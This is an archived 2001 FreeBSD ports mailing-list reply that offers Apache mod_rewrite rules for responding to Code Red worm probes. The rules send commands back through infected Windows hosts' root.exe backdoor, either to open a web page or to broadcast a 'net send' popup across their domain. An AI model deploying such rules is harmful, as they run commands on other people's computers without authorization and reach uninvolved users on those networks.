Date: Mon, 10 Sep 2001 17:59:41 -0700 From: "Michael Scheidell" <scheidell@fdma.com> To: <freebsd-ports@freebsd.org> Subject: Re: Apache::CodeRed : anyone thought of porting it? Message-ID: <010e01c13a5d$0a208f00$2801010a@MIKELT> References: <3B98DCF5.5851.5521A430@localhost>
next in thread | previous in thread | raw e-mail | index | archive | help
----- Original Message ----- From: ""Dan Langille"" <dan@langille.org> Newsgroups: local.freebsd.ports Sent: Friday, September 07, 2001 11:43 AM Subject: Apache::CodeRed : anyone thought of porting it? > Has anyone thought of porting Apache::CodeRed? See > http://www.onlamp.com/pub/a/apache/2001/08/16/code_red.html for details. other option is to use apache rewrite module and use tne same 'sploit to send a net popup or start a copy of ie (note, if using virtual servers, you will wan this on the default one.. the one hit when looking at the ip address) no wraps on this, put this in /usr/local/etc/apache/httpd.conf and restart apache. Rewriteengine on no wraps below (one line) RewriteRule ^(.*)/default.ida(.*) http://%{REMOTE_ADDR}/c/inetpub/scripts/root. exe?/c+start+http://24.17.180.183/anticodered.html or this (if you want to send a net popup to hundreds,maybe thousands of systems on the same domain: Rewriteengine on RewriteRule ^(.*)/default.ida(.*) http://%{REMOTE_ADDR}/c/inetpub/scripts/root. exe?/c+net+send+*+Your+computer+is+infected+by+a+Code+Red+Worm.+I+did+not+in fect+you.+This+is+a+courtesy+response+generated+when+your+computer+attempted +to+infect+mine.+Your+computer+is+completely+exposed.+Visit+http://www.dynwe bdev.com/codered/alert.htm+immediately. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?010e01c13a5d$0a208f00$2801010a>